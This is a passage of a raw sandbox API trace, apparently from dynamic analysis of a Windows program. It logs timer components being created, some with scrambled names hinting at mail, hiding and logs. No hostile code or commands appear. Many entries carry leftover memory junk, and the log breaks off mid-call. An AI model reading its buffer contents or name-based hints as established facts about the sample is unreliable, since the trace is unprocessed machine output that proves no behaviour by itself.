(in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM8LGTimer", cchWideChar=12, lpMultiByteStr=0x68ff425, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM8LGTimer", lpUsedDefaultChar=0x0) returned 12 [0039.706] KillTimer (hWnd=0x500fe, uIDEvent=0x1) returned 0 [0039.706] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.706] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x71d1668, cchWideChar=4 | out: lpWideCharStr="Left浩牥\x01") returned 4 [0039.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca31c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0039.706] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.706] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x71d1668, cchWideChar=3 | out: lpWideCharStr="Topt浩牥\x01") returned 3 [0039.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca29c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.706] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.706] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x71d1668, cchWideChar=6 | out: lpWideCharStr="TTimerೠܝ\x02") returned 6 [0039.706] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0039.706] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=9, lpWideCharStr=0x71ca298, cchWideChar=9 | out: lpWideCharStr="tmrBx8M4v") returned 9 [0039.706] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca29c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.706] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0039.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4c1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢\x1c\x07çF\x95uÜ¢\x1c\x07\x88½\x0b", lpUsedDefaultChar=0x0) returned 0 [0039.706] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TPUtilWindow", lpWndClass=0x68ff5c0 | out: lpWndClass=0x68ff5c0) returned 1 [0039.706] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x3014e [0039.707] SetWindowLongW (hWnd=0x3014e, nIndex=-4, dwNewLong=83758931) returned 112917644 [0039.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrBx8M4v", cchWideChar=9, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrBx8M4v", lpUsedDefaultChar=0x0) returned 9 [0039.707] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0039.707] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=8, lpWideCharStr=0x71ca298, cchWideChar=8 | out: lpWideCharStr="Interval") returned 8 [0039.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x71e6d8c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Interval8", lpUsedDefaultChar=0x0) returned 8 [0039.707] KillTimer (hWnd=0x3014e, uIDEvent=0x1) returned 0 [0039.707] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.707] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x71ca298, cchWideChar=7 | out: lpWideCharStr="OnTimerl") returned 7 [0039.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x71e021c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0039.707] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca318, cbMultiByte=14, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0039.708] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca318, cbMultiByte=14, lpWideCharStr=0x71e0218, cchWideChar=14 | out: lpWideCharStr="tmrBx8M4vTimer") returned 14 [0039.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrBx8M4vTimer", cchWideChar=14, lpMultiByteStr=0x68ff425, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrBx8M4vTimer", lpUsedDefaultChar=0x0) returned 14 [0039.708] KillTimer (hWnd=0x3014e, uIDEvent=0x1) returned 0 [0039.708] SetTimer (hWnd=0x3014e, nIDEvent=0x1, uElapse=0xea60, lpTimerFunc=0x0) returned 0x1 [0039.708] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.708] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x71d1680, cchWideChar=4 | out: lpWideCharStr="Leftv") returned 4 [0039.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca29c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0039.708] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.708] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x71d1680, cchWideChar=3 | out: lpWideCharStr="Toptv") returned 3 [0039.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca35c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.708] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.708] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x71d1680, cchWideChar=6 | out: lpWideCharStr="TTimer") returned 6 [0039.708] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0039.708] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=10, lpWideCharStr=0x71ca358, cchWideChar=10 | out: lpWideCharStr="tmrM83mail\x01") returned 10 [0039.708] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca35c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.708] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0039.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4c1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢\x1c\x07çF\x95uÜ¢\x1c\x07\x88½\x0b", lpUsedDefaultChar=0x0) returned 0 [0039.708] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TPUtilWindow", lpWndClass=0x68ff5c0 | out: lpWndClass=0x68ff5c0) returned 1 [0039.708] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x20156 [0039.709] SetWindowLongW (hWnd=0x20156, nIndex=-4, dwNewLong=83758918) returned 112917644 [0039.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM83mail", cchWideChar=10, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM83mail", lpUsedDefaultChar=0x0) returned 10 [0039.709] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.709] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x71ca358, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0039.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x71e01f4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0039.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x71ca37c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0039.709] KillTimer (hWnd=0x20156, uIDEvent=0x1) returned 0 [0039.709] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0039.709] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=8, lpWideCharStr=0x71ca318, cchWideChar=8 | out: lpWideCharStr="Intervald") returned 8 [0039.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x71e6d8c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Intervalx", lpUsedDefaultChar=0x0) returned 8 [0039.709] KillTimer (hWnd=0x20156, uIDEvent=0x1) returned 0 [0039.710] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.710] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x71ca358, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0039.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x71e0244, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0039.710] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca298, cbMultiByte=15, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0039.710] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca298, cbMultiByte=15, lpWideCharStr=0x71e6d88, cchWideChar=15 | out: lpWideCharStr="tmrM83mailTimerr") returned 15 [0039.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM83mailTimer", cchWideChar=15, lpMultiByteStr=0x68ff425, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM83mailTimer\x0f", lpUsedDefaultChar=0x0) returned 15 [0039.710] KillTimer (hWnd=0x20156, uIDEvent=0x1) returned 0 [0039.710] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.710] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x71d1668, cchWideChar=4 | out: lpWideCharStr="Left汩") returned 4 [0039.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca35c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0039.710] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.710] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x71d1668, cchWideChar=3 | out: lpWideCharStr="Topt汩") returned 3 [0039.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca31c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.710] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.710] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x71d1668, cchWideChar=6 | out: lpWideCharStr="TTimerೠܝ\x02") returned 6 [0039.710] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0039.710] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=9, lpWideCharStr=0x71ca318, cchWideChar=9 | out: lpWideCharStr="tmrM8H1d3") returned 9 [0039.710] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca31c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.710] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0039.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4c1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢\x1c\x07çF\x95uÜ¢\x1c\x07\x88½\x0b", lpUsedDefaultChar=0x0) returned 0 [0039.710] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TPUtilWindow", lpWndClass=0x68ff5c0 | out: lpWndClass=0x68ff5c0) returned 1 [0039.710] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x10158 [0039.712] SetWindowLongW (hWnd=0x10158, nIndex=-4, dwNewLong=83758905) returned 112917644 [0039.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM8H1d3", cchWideChar=9, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM8H1d3", lpUsedDefaultChar=0x0) returned 9 [0039.712] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.712] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x71ca318, cchWideChar=7 | out: lpWideCharStr="OnTimerr") returned 7 [0039.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x71e01f4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0039.712] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca358, cbMultiByte=14, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0039.712] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca358, cbMultiByte=14, lpWideCharStr=0x71e01f0, cchWideChar=14 | out: lpWideCharStr="tmrM8H1d3TimerܝҰ\x02\x01") returned 14 [0039.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM8H1d3Timer", cchWideChar=14, lpMultiByteStr=0x68ff425, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM8H1d3Timer", lpUsedDefaultChar=0x0) returned 14 [0039.712] KillTimer (hWnd=0x10158, uIDEvent=0x1) returned 0 [0039.712] SetTimer (hWnd=0x10158, nIDEvent=0x1, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x1 [0039.712] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.712] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x71d1680, cchWideChar=4 | out: lpWideCharStr="Left3") returned 4 [0039.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca31c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0039.712] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.712] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=3, lpWideCharStr=0x71d1680, cchWideChar=3 | out: lpWideCharStr="Topt3") returned 3 [0039.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca29c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.713] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.713] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x71d1680, cchWideChar=6 | out: lpWideCharStr="TTimer") returned 6 [0039.713] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca298, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0039.713] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca298, cbMultiByte=13, lpWideCharStr=0x71e01f0, cchWideChar=13 | out: lpWideCharStr="tmrS4v38MLogsrܝҰ\x02\x01") returned 13 [0039.713] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca29c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.713] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0039.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4c1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢\x1c\x07çF\x95uÜ¢\x1c\x07\x88½\x0b", lpUsedDefaultChar=0x0) returned 0 [0039.713] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TPUtilWindow", lpWndClass=0x68ff5c0 | out: lpWndClass=0x68ff5c0) returned 1 [0039.713] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x1015a [0039.713] SetWindowLongW (hWnd=0x1015a, nIndex=-4, dwNewLong=83758892) returned 112917644 [0039.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrS4v38MLogs", cchWideChar=13, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrS4v38MLogs", lpUsedDefaultChar=0x0) returned 13 [0039.714] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.714] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x71ca298, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0039.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x71e01f4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0039.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x71ca37c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0039.714] KillTimer (hWnd=0x1015a, uIDEvent=0x1) returned 0 [0039.714] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0039.714] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=8, lpWideCharStr=0x71ca358, cchWideChar=8 | out: lpWideCharStr="Intervald") returned 8 [0039.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x71e6d8c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Intervalm", lpUsedDefaultChar=0x0) returned 8 [0039.714] KillTimer (hWnd=0x1015a, uIDEvent=0x1) returned 0 [0039.714] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.714] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x71ca298, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0039.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x71e026c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0039.714] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca318, cbMultiByte=18, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18 [0039.714] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca318, cbMultiByte=18, lpWideCharStr=0x71e6d88, cchWideChar=18 | out: lpWideCharStr="tmrS4v38MLogsTimer晰ܞҰ\x02\x01") returned 18 [0039.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrS4v38MLogsTimer", cchWideChar=18, lpMultiByteStr=0x68ff425, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrS4v38MLogsTimer", lpUsedDefaultChar=0x0) returned 18 [0039.714] KillTimer (hWnd=0x1015a, uIDEvent=0x1) returned 0 [0039.714] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.714] MultiByteToWideChar 